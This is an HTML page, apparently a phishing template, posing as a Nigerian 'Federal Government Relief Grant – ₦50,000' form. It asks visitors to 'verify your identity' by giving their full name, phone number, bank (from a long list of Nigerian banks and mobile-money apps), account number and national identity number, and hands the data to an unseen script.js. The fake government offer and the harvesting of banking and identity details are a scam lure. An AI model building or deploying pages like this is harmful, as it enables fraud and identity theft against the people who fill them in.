<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Presidential Grant Form</title>
  <link rel="stylesheet" href="style.css" />
</head>
<body>
  <div class="container">
    <h1>Federal Government Relief Grant – ₦50,000</h1>
    <p>Please fill out the form to verify your identity and claim your relief payment.</p>
    <form id="grantForm">
      <input type="text" id="fullname" placeholder="Full Name" required />
      <input type="text" id="phone" placeholder="Phone Number" required />
      
      <select id="bank" required>
        <option value="" disabled selected>Select Your Bank</option>
        <option>Access Bank</option>
        <option>Zenith Bank</option>
        <option>GTBank</option>
        <option>First Bank</option>
        <option>UBA</option>
        <option>Polaris Bank</option>
        <option>Union Bank</option>
        <option>Wema Bank</option>
        <option>Fidelity Bank</option>
        <option>Ecobank</option>
        <option>Stanbic IBTC</option>
        <option>Keystone Bank</option>
        <option>Jaiz Bank</option>
        <option>Heritage Bank</option>
        <option>Providus Bank</option>
        <option>SunTrust Bank</option>
        <option>Opay</option>
        <option>PalmPay</option>
        <option>Kuda Bank</option>
        <option>Moniepoint</option>
      </select>
      
      <input type="text" id="account" placeholder="Account Number" required />
      <input type="text" id="nin" placeholder="NIN (optional)" />
      <button type="submit">Submit</button>
    </form>
    <p id="status"></p>
  </div>

  <script src="script.js"></script>
</body>
</html>